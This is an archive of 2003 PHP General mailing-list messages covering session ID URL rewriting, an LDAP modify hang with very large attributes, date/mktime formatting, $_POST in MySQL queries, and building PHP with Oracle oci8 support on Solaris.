I finally discovered the problem. There was extra whitespace after the php closing tag ? that was being interpreted as part of the header. Removing the whitespace fixed the problem. Peter Peter Walter wrote: Mike, I hope you mean session_start(). Yes, I did. Getting a bit dyslexic nowadays. Well, you would, because PHP would use the value from the PHPSESSID= URL parameter. ... except that on the second call, the url (as displayed by the browser) does not contain the PHPSESSID parameter, yet I am still able to retrieve the session variables correctly ... My immediate reaction to this is that session.use_cookies must be set to 0 (or Off) in your php.ini (or equivalent). Have you checked this? If it looks correct, what does a phpinfo() page show? php.ini contains the following settings: [Session] session.save_handler = files session.save_path = /tmp session.use_cookies = 1 session.name = PHPSESSID session.auto_start= 0 session.cookie_lifetime = 0 session.cookie_path = / session.cookie_domain = session.serialize_handler = php session.gc_probability= 1 session.gc_maxlifetime= 1440 session.referer_check = session.entropy_length= 0 session.entropy_file = session.cache_limiter = nocache session.cache_expire = 180 session.use_trans_sid = 1 url_rewriter.tags = a=href,area=href,frame=src,input=src,form=fakeentry In phpinfo(), the local value matches the master value for all entries, and match the entries in php.ini. I appreciate that this issue isn't a big deal - but I had hoped to understand php well enough to tell the difference between a bug and a feature. If it would help, I could send you the url for the page? (password protected) Peter Ford, Mike [LSS] wrote: On 11 December 2003 18:01, Peter Walter wrote: Mike, Thanks for the additional explanation, and I understand the sequence of events as you described. However, please bear with me a bit - the results I am getting do not quite match your explanation. Let me clarify what I am doing: I have a page (index.php) which starts out by calling start_session(), I hope you mean session_start(). then emits some html code containing some form variables for search criteria. After the form variables, I have a submit button that refers to index.php. Following that, I have php logic that extracts the search criteria (if set) from $HTTP_POST_VARS, performs a MySQL query, then creates a table of results (if any); one of the table entries contains a a href= link to determine which row the user selected. The first time I load the page, I assume the session is created by start_session(), and the cookie is sent to the browser. When I click on the submit button, the page is reloaded - I assume with the session active - as per your explanation. According tho the documentation I have read, the second time the page is loaded, start_session() will simply reuse the existing session parameters. At this point, the browser should already have the cookie - if it did not, I would not be able to retrieve the session variables Well, you would, because PHP would use the value from the PHPSESSID= URL parameter. - but the url links in the table are still rewritten. I do not understand why. My immediate reaction to this is that session.use_cookies must be set to 0 (or Off) in your php.ini (or equivalent). Have you checked this? If it looks correct, what does a phpinfo() page show? Cheers! Mike - Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning Information Services, JG125, James Graham Building, Leeds Metropolitan University, Beckett Park, LEEDS, LS6 3QS, United Kingdom Email: [EMAIL PROTECTED] Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: PHP IDE?
Rush, templatetamer looks like an environment that I would be interested in using; however, what support resources are available for templatetamer? Is there a news server, bulletin board, or other help resource for people new to templatetamer? Peter Rush wrote: Jough Jeaux [EMAIL PROTECTED] wrote in message news:[EMAIL PROTECTED] Was wondering what everyone's favortie IDE is for coding in PHP. I've got a big PHP project in the works. I'll be doing alot with it and am looking for ways to boost my productivity. If you are going to work with templates, you can take a look at TemplateTamer, which has IDE geared for such development. rush -- http://www.templatetamer.com/ -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] Session Link Problems
Steve, As Mike said, I have a similar problem. I am using PHP 4.1.2. What release are you using? Peter Mike Ford wrote: On 12 December 2003 00:03, Steve Turner wrote: Hi, I am having a problem with sessions. On my testing machine my script works perfectly. However on the remote server it tries to pass the session id in the url even though I am accepting cookies. It is messing up all my links since it puts PHPSESSID=6a4626fc1cde0fb228fcb3ebe5587ffd in front of my hrefs without an after. If I click the link then it registers the session as a cookie and everything works fine from there on out. Don't understand what is happening as everyting used to work fine, and I don't think I changed anyting. Don't know how well I described this. Have you upgraded PHP recently? As far as I recollect, this behaviour was changed somewhere in the 4.1.x-4.2.x range of releases. For a full description of the exact behaviour, see my recent post in response to Peter Walter (sent on 11-Dec at 17:36 GMT). If you want your session handling to rely solely on cookies, then set the session.use_only_cookies option in php.ini -- but be aware that anyone using a browser with cookies turned off will not be able to use your site. Cheers! Mike - Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning Information Services, JG125, James Graham Building, Leeds Metropolitan University, Beckett Park, LEEDS, LS6 3QS, United Kingdom Email: [EMAIL PROTECTED] Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] url rewriting within sessions - confused newbie needs help
Jason, Thanks for your help. It is a little clearer to me now. However, I have visited php sites that *claim* to be using session management but where the links do not have the session id appended, and there are no variables being passed in the url for links. The url is always in the form www.somesite.com/index.php or just www.somesite.com. In these cases, how is the url rewriting being suppressed for the links on the page? I simply want to understand the technique. Peter Jason Wong wrote: On Thursday 11 December 2003 14:16, Peter Walter wrote: From the book Core PHP programming, 3ed ; As stated earlier, PHP sends session identifiers with cookies, but a browser may refuse them. PHP can detect when a browser does not accept cookies, and in this situation it modifies all forms and links to include the session identifier. My php pages all include start_session() before any content is sent to the browser, and my browser is configured to accept cookies. Nevertheless, any coded relative url links (a href=...) are all modified to include PHPSESSID=12345, although the cookie *should* be set. I am using PHP 4.x. Why is this happening? When your browser first hits the page (ie when no session has been started yet) the links and the URL will have the session ID appended. This is because at that stage the server does not know your browser is accepting cookies. When you continue browsing your browser will send the session cookie thus signalling to the server that cookies are being accepted and should then no longer append the session ID. -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] url rewriting within sessions - confused newbie needs h elp
Mike, Thanks for the additional explanation, and I understand the sequence of events as you described. However, please bear with me a bit - the results I am getting do not quite match your explanation. Let me clarify what I am doing: I have a page (index.php) which starts out by calling start_session(), then emits some html code containing some form variables for search criteria. After the form variables, I have a submit button that refers to index.php. Following that, I have php logic that extracts the search criteria (if set) from $HTTP_POST_VARS, performs a MySQL query, then creates a table of results (if any); one of the table entries contains a a href= link to determine which row the user selected. The first time I load the page, I assume the session is created by start_session(), and the cookie is sent to the browser. When I click on the submit button, the page is reloaded - I assume with the session active - as per your explanation. According tho the documentation I have read, the second time the page is loaded, start_session() will simply reuse the existing session parameters. At this point, the browser should already have the cookie - if it did not, I would not be able to retrieve the session variables - but the url links in the table are still rewritten. I do not understand why. Being new to the stateless paradigm of web applications, and to php, I feel a bit nervous about coding when I do not quite grasp what is going on. Peter Ford, Mike [LSS] wrote: On 11 December 2003 16:54, Peter Walter wrote: Jason, Thanks for your help. It is a little clearer to me now. However, I have visited php sites that *claim* to be using session management but where the links do not have the session id appended, and there are no variables being passed in the url for links. The url is always in the form www.somesite.com/index.php or just www.somesite.com. In these cases, how is the url rewriting being suppressed for the links on the page? I simply want to understand the technique. If url rewriting (session.use_trans_sid) is enabled, and your browser is accepting cookies, then the sequence of events goes like this: 1. First request to your site -- browser has no cookie set, so cannot send it. 2. PHP responds with a page, including a header to set the PHPSESSID cookie; because, at this stage, PHP has no idea whether your browser will accept cookies, it also rewrites all URLs contained in the page to include a PHPSESSID= parameter. 3. Your browser displays the page, and sets the cookie. 4. You click a link to get the next page -- in addition to sending a request for the URL containing the PHPSESSID= parameter, your browser also sends the newly-set PHPSESSID cookie. 5. PHP responds with the new page, but, because it has received the PHPSESSID cookie in the previous step it now knows your browser is accepting cookies and does not bother to do any URL rewriting. 6. None of the URLs in the new page have the PHPSESSID= parameter appended -- transmission of the session id is now solely via the PHPSESSID cookie. Various things can influence this behaviour: - If your browser is not accepting cookies, URL rewriting will always occur and you will continue to see PHPSESSID= parameters appended. - If session.use_trans_sid is not set, PHP will do no URL rewriting but will attempt to use cookies (if enabled) -- if your browser doesn't accept cookies, sessions will fail to work (unless you manually append PHPSESSID= parameters where needed -- the SID built-in constant is provided for this). - If session.use_cookies is not set, PHP will not even attempt to use a cookie for the session id. - If session.use_only_cookies is set, PHP will use *only* cookies to store the session id -- again, if your browser is not accepting cookies, sessions will not work. As you can see, there are many ways of setting this up, with a few subtle nuances -- and some of the combinations don't actually make much sense (use_trans_sid=1 and use_only_cookies=1, for instance). Note that you *can* set it up so that PHP does no automatic PHPSESSID setting at all (use_trans_sid=0 and use_cookies=0) -- then it's up to you to manually append the PHPSESSID= parameter to all appropriate URLs. Cheers! Mike - Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning Information Services, JG125, James Graham Building, Leeds Metropolitan University, Beckett Park, LEEDS, LS6 3QS, United Kingdom Email: [EMAIL PROTECTED] Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211
Re: [PHP] url rewriting within sessions - confused newbie needs help
Mike, I hope you mean session_start(). Yes, I did. Getting a bit dyslexic nowadays. Well, you would, because PHP would use the value from the PHPSESSID= URL parameter. ... except that on the second call, the url (as displayed by the browser) does not contain the PHPSESSID parameter, yet I am still able to retrieve the session variables correctly ... My immediate reaction to this is that session.use_cookies must be set to 0 (or Off) in your php.ini (or equivalent). Have you checked this? If it looks correct, what does a phpinfo() page show? php.ini contains the following settings: [Session] session.save_handler = files session.save_path = /tmp session.use_cookies = 1 session.name = PHPSESSID session.auto_start= 0 session.cookie_lifetime = 0 session.cookie_path = / session.cookie_domain = session.serialize_handler = php session.gc_probability= 1 session.gc_maxlifetime= 1440 session.referer_check = session.entropy_length= 0 session.entropy_file = session.cache_limiter = nocache session.cache_expire = 180 session.use_trans_sid = 1 url_rewriter.tags = a=href,area=href,frame=src,input=src,form=fakeentry In phpinfo(), the local value matches the master value for all entries, and match the entries in php.ini. I appreciate that this issue isn't a big deal - but I had hoped to understand php well enough to tell the difference between a bug and a feature. If it would help, I could send you the url for the page? (password protected) Peter Ford, Mike [LSS] wrote: On 11 December 2003 18:01, Peter Walter wrote: Mike, Thanks for the additional explanation, and I understand the sequence of events as you described. However, please bear with me a bit - the results I am getting do not quite match your explanation. Let me clarify what I am doing: I have a page (index.php) which starts out by calling start_session(), I hope you mean session_start(). then emits some html code containing some form variables for search criteria. After the form variables, I have a submit button that refers to index.php. Following that, I have php logic that extracts the search criteria (if set) from $HTTP_POST_VARS, performs a MySQL query, then creates a table of results (if any); one of the table entries contains a a href= link to determine which row the user selected. The first time I load the page, I assume the session is created by start_session(), and the cookie is sent to the browser. When I click on the submit button, the page is reloaded - I assume with the session active - as per your explanation. According tho the documentation I have read, the second time the page is loaded, start_session() will simply reuse the existing session parameters. At this point, the browser should already have the cookie - if it did not, I would not be able to retrieve the session variables Well, you would, because PHP would use the value from the PHPSESSID= URL parameter. - but the url links in the table are still rewritten. I do not understand why. My immediate reaction to this is that session.use_cookies must be set to 0 (or Off) in your php.ini (or equivalent). Have you checked this? If it looks correct, what does a phpinfo() page show? Cheers! Mike - Mike Ford, Electronic Information Services Adviser, Learning Support Services, Learning Information Services, JG125, James Graham Building, Leeds Metropolitan University, Beckett Park, LEEDS, LS6 3QS, United Kingdom Email: [EMAIL PROTECTED] Tel: +44 113 283 2600 extn 4730 Fax: +44 113 283 3211
[PHP] url rewriting within sessions - confused newbie needs help
From the book Core PHP programming, 3ed ; As stated earlier, PHP sends session identifiers with cookies, but a browser may refuse them. PHP can detect when a browser does not accept cookies, and in this situation it modifies all forms and links to include the session identifier. My php pages all include start_session() before any content is sent to the browser, and my browser is configured to accept cookies. Nevertheless, any coded relative url links (a href=...) are all modified to include PHPSESSID=12345, although the cookie *should* be set. I am using PHP 4.x. Why is this happening? Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] (More Information) was Problems with ldap_modify() and very large entries
Here's a followup to my problem with ldap_mod_replace and ldap_modify.
Attached is a simple program demonstrating the problem. Basically,
if you try to fill an attribute in ldap that is something around 17000
characters or above, ldap_mod_replace hangs. I've determined it
is definately a PHP problem, since ldap_modify
from the commandline works consistently and fine with very high amounts of
data.
Thus, in the following simple code:
$conn = ldap_connect(ldap://ldap.server.net;);
ldap_set_option($conn, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_start_tls($conn);
ldap_bind($conn, 'uid=root,ou=users,dc=server,dc=net', 'password');
$dn = mnTB=CB1,mnTS=abra,mnT=index,dc=peterjh,dc=in,dc=us,dc=server,dc=net;
$array = array();
$output = ;
for ($i = 0; $i 170; $i++)
{
# 26 * 4 = 104 - 4 = 100
# thus append a hundred characters each iteration
$string =
efghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk
$output .= $string;
}
print strlen($output) .\n;
$array['mnappparam'][0] = $output;
ldap_mod_replace($conn, $dn, $array);
Setting the top of $i to 170 or above hangs (consistently) ldap_mod_replace.
Technically, 161-180 (thus, 17000-18000 characters) hangs inconsistently,
while 160 and belows never hangs (16000 characters) and 181+ (181000
chars) hangs everytime.
Any help on this would be highly appreciated,
Peter John Hartman
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] (More Information) was Problems with ldap_modify() and very large entries
Just to note:
the problem holds true for: ldap_mod_add, ldap_modify, and ldap_mod_replace.
Also, adding ldap_set_option($conn, LDAP_OPT_SIZELIMIT, 20) doesn't
resolve the problem (or setting it to 0).
Peter
On Tue, 2 Dec 2003, Peter J Hartman wrote:
Here's a followup to my problem with ldap_mod_replace and ldap_modify.
Attached is a simple program demonstrating the problem. Basically,
if you try to fill an attribute in ldap that is something around 17000
characters or above, ldap_mod_replace hangs. I've determined it
is definately a PHP problem, since ldap_modify
from the commandline works consistently and fine with very high amounts of
data.
Thus, in the following simple code:
$conn = ldap_connect(ldap://ldap.server.net;);
ldap_set_option($conn, LDAP_OPT_PROTOCOL_VERSION, 3);
ldap_start_tls($conn);
ldap_bind($conn, 'uid=root,ou=users,dc=server,dc=net', 'password');
$dn = mnTB=CB1,mnTS=abra,mnT=index,dc=peterjh,dc=in,dc=us,dc=server,dc=net;
$array = array();
$output = ;
for ($i = 0; $i 170; $i++)
{
# 26 * 4 = 104 - 4 = 100
# thus append a hundred characters each iteration
$string =
efghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyzabcdefghijk
$output .= $string;
}
print strlen($output) .\n;
$array['mnappparam'][0] = $output;
ldap_mod_replace($conn, $dn, $array);
Setting the top of $i to 170 or above hangs (consistently) ldap_mod_replace.
Technically, 161-180 (thus, 17000-18000 characters) hangs inconsistently,
while 160 and belows never hangs (16000 characters) and 181+ (181000
chars) hangs everytime.
Any help on this would be highly appreciated,
Peter John Hartman
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Problems with ldap_modify() and very large entries
Here is a problem which I've been completely unable to unravel. Basically, if I call ldap_modify (or ldap_mod_replace) with a VERY large amount of data in the attributes array (see ldif below), the browser will just turn and turn and turn and never finish or report anything. But, I can do a print_r on the array passed to ldap_mod_replace and run ldap_modify from the commandline on it (after properly formatting it) and it works absolutely and quickly. I can't figure this out. Any help would be very very nice. If you need me to provide more information, let me know. Peter the ldif file: dn: mnTB=CB2,mnTS=Bulletin,mnTS=Worship,mnT=index,dc=berkeyavenue,dc=in,dc=us,dc=mennonite,dc=net mnappparam: tmpFolderSettings:YToxNTp7czo1OiJmaWxlcyI7YTo1Mjp7aTowO2E6NTp7czo0OiJuYW1lIjtzOjY6Im91dHB1dCI7czo2OiJzdGF0dXMiO3M6NzoidmlzaWJsZSI7czoyOiJkbiI7czo5MToibW5GPW91dHB1dCxtbk9EPUJ1bGxldGlucyxtbk9EPU15IERvY3VtZW50cyxkYz1iZXJrZXlhdmVudWUsZGM9aW4sZGM9dXMsZGM9bWVubm9uaXRlLGRjPW5ldCI7czoxMjoiZXhwRGF0ZU5ldmVyIjtzOjU6Im5ldmVyIjtzOjc6ImV4cERhdGUiO3M6MTk6IjIwMDUtMTEtMjkgMTU6MjQ6NDUiO31pOjE7YTo1OntzOjQ6Im5hbWUiO3M6MTU6IkIyMDAzLTExLTIzLnJ0ZiI7czo2OiJzdGF0dXMiO3M6NzoidmlzaWJsZSI7czoyOiJkbiI7czoxMDA6Im1uRj1CMjAwMy0xMS0yMy5ydGYsbW5PRD1CdWxsZXRpbnMsbW5PRD1NeSBEb2N1bWVudHMsZGM9YmVya2V5YXZlbnVlLGRjPWluLGRjPXVzLGRjPW1lbm5vbml0ZSxkYz1uZXQiO3M6MTI6ImV4cERhdGVOZXZlciI7czo1OiJuZXZlciI7czo3OiJleHBEYXRlIjtzOjE5OiIyMDA1LTExLTI5IDEzOjQzOjQ0Ijt9aToyO2E6NTp7czo0OiJuYW1lIjtzOjE1OiJCMjAwMy0xMS0xNi5ydGYiO3M6Njoic3RhdHVzIjtzOjc6InZpc2libGUiO3M6MjoiZG4iO3M6MTAwOiJtbkY9QjIwMDMtMTEtMTYucnRmLG1uT0Q9QnVsbGV0aW5zLG1uT0Q9TXkgRG9jdW1lbnRzLGRjPWJlcmtleWF2ZW51ZSxkYz1pbixkYz11cyxkYz1tZW5ub25pdGUsZGM9bmV0IjtzOjE! yOiJleHBEYXRlTmV2ZXIiO3M6NToibmV2ZXIiO3M6NzoiZXhwRGF0ZSI7czoxOToiMjAwNS0xMS0yOSAxMzo0Mzo0NCI7fWk6MzthOjU6e3M6NDoibmFtZSI7czoxNToiQjIwMDMtMTEtMDkucnRmIjtzOjY6InN0YXR1cyI7czo3OiJ2aXNpYmxlIjtzOjI6ImRuIjtzOjEwMDoibW5GPUIyMDAzLTExLTA5LnJ0Zixtbk9EPUJ1bGxldGlucyxtbk9EPU15IERvY3VtZW50cyxkYz1iZXJrZXlhdmVudWUsZGM9aW4sZGM9dXMsZGM9bWVubm9uaXRlLGRjPW5ldCI7czoxMjoiZXhwRGF0ZU5ldmVyIjtzOjU6Im5ldmVyIjtzOjc6ImV4cERhdGUiO3M6MTk6IjIwMDUtMTEtMjkgMTM6NDM6NDQiO31pOjQ7YTo1OntzOjQ6Im5hbWUiO3M6MTU6IkIyMDAzLTExLTAyLnJ0ZiI7czo2OiJzdGF0dXMiO3M6NzoidmlzaWJsZSI7czoyOiJkbiI7czoxMDA6Im1uRj1CMjAwMy0xMS0wMi5ydGYsbW5PRD1CdWxsZXRpbnMsbW5PRD1NeSBEb2N1bWVudHMsZGM9YmVya2V5YXZlbnVlLGRjPWluLGRjPXVzLGRjPW1lbm5vbml0ZSxkYz1uZXQiO3M6MTI6ImV4cERhdGVOZXZlciI7czo1OiJuZXZlciI7czo3OiJleHBEYXRlIjtzOjE5OiIyMDA1LTExLTI5IDEzOjQzOjQ0Ijt9aTo1O2E6NTp7czo0OiJuYW1lIjtzOjE1OiJCMjAwMy0xMC0yNi5ydGYiO3M6Njoic3RhdHVzIjtzOjc6InZpc2libGUiO3M6MjoiZG4iO3M6MTAwOiJtbkY9QjIwMDMtMTAtMjYucnRmLG1uT0Q9QnVsbGV0aW5zLG1uT0Q9TXkgRG9jdW1lbnRzLGRjPWJlcmtl! eWF2ZW51ZSxkYz1pbixkYz11cyxkYz1tZW5ub25pdGUsZGM9bmV0IjtzOjEyOiJleHBEYXRlTmV2ZXIiO3M6NToibmV2ZXIiO3M6NzoiZXhwRGF0ZSI7czoxOToiMjAwNS0xMS0yOSAxMzo0Mzo0NCI7fWk6NjthOjU6e3M6NDoibmFtZSI7czoxNToiQjIwMDMtMTAtMTkucnRmIjtzOjY6InN0YXR1cyI7czo3OiJ2aXNpYmxlIjtzOjI6ImRuIjtzOjEwMDoibW5GPUIyMDAzLTEwLTE5LnJ0Zixtbk9EPUJ1bGxldGlucyxtbk9EPU15IERvY3VtZW50cyxkYz1iZXJrZXlhdmVudWUsZGM9aW4sZGM9dXMsZGM9bWVubm9uaXRlLGRjPW5ldCI7czoxMjoiZXhwRGF0ZU5ldmVyIjtzOjU6Im5ldmVyIjtzOjc6ImV4cERhdGUiO3M6MTk6IjIwMDUtMTEtMjkgMTM6NDM6NDQiO31pOjc7YTo1OntzOjQ6Im5hbWUiO3M6MTU6IkIyMDAzLTEwLTEwLnJ0ZiI7czo2OiJzdGF0dXMiO3M6NzoidmlzaWJsZSI7czoyOiJkbiI7czoxMDA6Im1uRj1CMjAwMy0xMC0xMC5ydGYsbW5PRD1CdWxsZXRpbnMsbW5PRD1NeSBEb2N1bWVudHMsZGM9YmVya2V5YXZlbnVlLGRjPWluLGRjPXVzLGRjPW1lbm5vbml0ZSxkYz1uZXQiO3M6MTI6ImV4cERhdGVOZXZlciI7czo1OiJuZXZlciI7czo3OiJleHBEYXRlIjtzOjE5OiIyMDA1LTExLTI5IDEzOjQzOjQ0Ijt9aTo4O2E6NTp7czo0OiJuYW1lIjtzOjE0OiJCMjAwMy0xMC0zLnJ0ZiI7czo2OiJzdGF0dXMiO3M6NzoidmlzaWJsZSI7czoyOiJkbiI7czo5OToibW5GPUIyMDAzLTEwLTMucnRmL! G1uT0Q9QnVsbGV0aW5zLG1uT0Q9TXkgRG9jdW1lbnRzLGRjPWJlcmtleWF2ZW51ZSxkYz1pbixkYz11cyxkYz1tZW5ub25pdGUsZGM9bmV0IjtzOjEyOiJleHBEYXRlTmV2ZXIiO3M6NToibmV2ZXIiO3M6NzoiZXhwRGF0ZSI7czoxOToiMjAwNS0xMS0yOSAxMzo0Mzo0NCI7fWk6OTthOjU6e3M6NDoibmFtZSI7czoxNToiQjIwMDMtMDktMjgucnRmIjtzOjY6InN0YXR1cyI7czo3OiJ2aXNpYmxlIjtzOjI6ImRuIjtzOjEwMDoibW5GPUIyMDAzLTA5LTI4LnJ0Zixtbk9EPUJ1bGxldGlucyxtbk9EPU15IERvY3VtZW50cyxkYz1iZXJrZXlhdmVudWUsZGM9aW4sZGM9dXMsZGM9bWVubm9uaXRlLGRjPW5ldCI7czoxMjoiZXhwRGF0ZU5ldmVyIjtzOjU6Im5ldmVyIjtzOjc6ImV4cERhdGUiO3M6MTk6IjIwMDUtMTEtMjkgMTM6NDM6NDQiO31pOjEwO2E6NTp7czo0OiJuYW1lIjtzOjE1OiJCMjAwMy0wOS0yMS5ydGYiO3M6Njoic3RhdHVzIjtzOjc6InZpc2libGUiO3M6MjoiZG4iO3M6MTAwOiJtbkY9QjIwMDMtMDktMjEucnRmLG1uT0Q9QnVsbGV0aW5zLG1uT0Q9TXkgRG9jdW1lbnRzLGRjPWJlcmtleWF2ZW51ZSxkYz1pbixkYz11cyxkYz1tZW5ub25pdGUsZGM9bmV0IjtzOjEyOiJleHBEYXRlTmV2ZXIiO3M6NToibmV2ZXIiO3M6NzoiZXhwRGF0ZSI7czoxOToiMjAwNS0xMS0yOSAxMzo0Mzo0NCI7fWk6MTE7YTo1OntzOjQ6Im5hbWUiO3M6MTU6IkIyMDAzLTA5LTE0LnJ0ZiI7czo2OiJzdGF0dXMiO3M6Nz! oidmlzaWJsZSI7czoyOiJkbiI7czoxMDA6Im1uRj1CMjAwMy0wOS0xNC5ydGYsbW5PRD1CdWxsZXRpbnMsbW5PRD1NeSBEb2N1bWVudHMsZGM9YmVya2V5YXZlbnVlLGRjPWluLGRjPXVzLGRjPW1lbm5vbml0ZSxkYz1uZXQiO3M6MTI6ImV4cERhdGVOZXZlciI7czo1OiJuZXZlciI7czo3OiJleHBEYXRlIjtzOjE5OiIyMDA1LTExLTI5I
[PHP] Re: Securing PHP code..
Video Populares Et Optimates wrote: Hi! I'm pondering on a problem here. Being a C/C++, Java and Visual Basic developer, the aspect of reverse engineering code from (compiled) programs, hasn't occupied my mind that much. Now, developing PHP scripts on large scale I have started to think otherwise. How do you all secure your code? I'd really appreciate if someone could give me the bare and gritty specifics on how it is possible to protect server side scripts such as PHP.. Thanks in advance, Video Populares et Optimates Have a look at Zend Encoder http://www.zend.com/store/products/zend-safeguard-suite.php There are others also. Peter -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Some Information on A Help Database Application Using PHP and XML
Et al, I'm interested in either designing or participating in a current project which utilizes PHP and XML to create a documentation application. My company (caravelcms.org) has designed a content management system using PHP and we are currently investigating how we can document effectively our various userland functions. Instead of re-inventing the wheel, I thought I'd put a call out to the PHP community to see if you could push me in the right direction. Basically, what I want is a way of writing and storing and inter-linking documentation for our application. It seems XML would be the best route to go, but I'd prefer the documentation app to also be in PHP. I'd imagine others have had a similar desire and perhaps an app is out there already. If anyone has insite, please let me know. Sincerely, Peter John Hartman caravelcms.org -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Printing from PHP
Is it possible to have a php a script that will run on my server but let me print to my client network printer? What I am doing is using php to generate html for a report from a data base which is displayed on the clients screen. I would like to offer the client the option of printing this report on their local printer . If php will not support access to a client printer is there any way of embedding a Form Feed in the display so that if the screen report is printed than the data will be correctly paginated? Regards Peter Goggin --- Outgoing mail is certified Virus Free. Checked by AVG anti-virus system (http://www.grisoft.com). Version: 6.0.532 / Virus Database: 326 - Release Date: 27/10/03 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Mail() Function on Cobalt Raq 4
Using a Cobalt Raq 4 w/php 4.3.1. The sendmail_path is : /usr/sbin/sendmail -t -iThis seems to be right. Can't get mail to send. Script works on other servers without fail. PHP Info here: http://www.ncafp.com/cgi-bin/phpInfo.php -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] N/A
I'm trying to use this function to outpot the content of a file that I change
time to time so I'd like to see the added text into file to appear in the
browser window.
Could you help me? (stream_select doesn't work???)
?
$fh = fopen('debug.txt','r+');
stream_set_blocking($fh ,true);
while(true){
$text = fgets($fh,10);
echo $text;
flush();
ob_flush();
}
fclose($fh);
?
Thanks.
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] mktime trouble
I'm taking a postgres timestamp from the database to something I can parse with PHP (i.e., a unix timestamp. Thing is, the date function isn't giving me the result I expect. Check this out: print date (m/d/y h:m:s A, mktime(16, 30, 0, 10, 10, 2003)); gives the output: 10/10/03 04:10:00 AM Where did the 4:10 come from? It should be 4:*30*. To make things stranger, when I change the month field in mktime to 9, like so: print date (m/d/y h:m:s A, mktime(16, 30, 0, 9, 10, 2003)); I get the output: 09/10/03 04:09:00 AM It works the same way if I feed date a Unix timestamp, so I'm sure this is a date problem. (using mktime in my example here is just clearer than playing with unix timestamps). date() and mktime() are usually simple enough, but something is going wrong. Perhaps it is a dumb mistake on my part, but I'm not seeing it peter -- Peter Torraca Webmaster, Math Department Purdue Univ., Math 813 765-494-9998 -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: [PHP-DB] $_POST in MySQL query issue...
On Thu, 16 Oct 2003, Adam Reiswig wrote: $sql=insert into $table set Name = '$_POST[elementName]'; Unfortunately this and every other combination I can think of, combinations of quotes that is, does not work. I believe the source of the problem is the quotes within quotes within quotes. I also tried: $sql='insert into $table set Name = '.$_POST[elementName]; or $sql=insert into $table set Name = .$_POST['elementName']; You need to quote the Name. $sql = 'insert into '.$table.' set Name = '.addslashes($_POST['elementName']).''; You've done everything here that you need, no extra variables, no nothing. Register_Globals is bad -- if you can avoid using it, do so. Performance-wise, it is better to use single quotes and concat the variables outside of the quoted line. Better performance, less problems with variables not being expanded correctly. Beckman --- Peter Beckman Internet Guy [EMAIL PROTECTED] http://www.purplecow.com/ --- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Re: [PHP-DB] Re: [PHP] $_POST in MySQL query issue...
On Fri, 17 Oct 2003, BAO RuiXian wrote: I see you can achieve this by two ways: 1. Take out all the inside quotes (single or double) like the following: $sql=insert into $table set Name = $_POST[elementName]; This is bad. Using no quotes MAY work, but it is considered a BARE WORD and not an actual string. $sql='insert into '.$table.' set Name = '.addslashes($_POST['elementName']).''; is the (more) correct way to do this. 2. Use a temporary variable for $_POST[elementName], like $elementName = $_POST[elementName], then continute use your original SQL sentence when the register_globals was on. Waste (albeit very minor) of variable space. Concat them. Beckman --- Peter Beckman Internet Guy [EMAIL PROTECTED] http://www.purplecow.com/ --- -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Installing Php with Apache on Solaris
I want to build Php(4.3.3) for Apache(1.3.28) on Solaris 8. I am configuring Php with oci8 (Oracle) support. Is it possible to build Php on system A, and then move the files over to another Solaris 8 system and expect it to function properly? I expect there to be a problem with the ORACLE_HOME path, if it's not the same on the second system. But I believe I should be able to solve that by 'export'ing ORACLE_HOME in the apachectl file. What I'm trying to do is build Apache and Php so that I can ship them and install them along with my product. Thanks for any help -- PHP General Mailing List (http://www.php.net/) To unsubscribe, visit: http://www.php.net/unsub.php
[PHP] Can't find oci.h
I'm building Php (4.3.3) on Solaris and am including oci8 support. Configure works fine. When I try to build, I get an error on the compilation of ext/oci8/oci8.c - it can't find oci.h, and then I get tons of errors, I suppose all stemming from this. I don't think this is supposed to be in the Oracle home directory, since there is no -I swithes on the compile line that reference Oracle home, except for -I/path/OraHome1/rdbms/demo Does anyone know what I'm missing? Below is the 1st make command: /bin/sh /export/home/emsuser/ped/php-4.3.3/libtool --silent --preserve-dup-deps --mode=compile gcc -Iext/oci8/ -I/export/home/emsuser/ped/php-4.3.3/ext/oci8/ -DPHP_ATOM_INC -I/export/home/emsuser/ped/php-4.3.3/include -I/export/home/emsuser/ped/php-4.3.3/main -I/export/home/emsuser/ped/php-4.3.3 -I/export/home/emsuser/ped/php-4.3.3/Zend -I/export/home/oracle/OraHome1/rdbms/demo -I/export/home/emsuser/ped/php-4.3.3/ext/xml/expat -D_POSIX_PTHREAD_SEMANTICS -I/export/home/emsuser/ped/php-4.3.3/TSRM -g -O2 -prefer-pic -c /export/home/emsuser/ped/php-4.3.3/ext/oci8/oci8.c -o 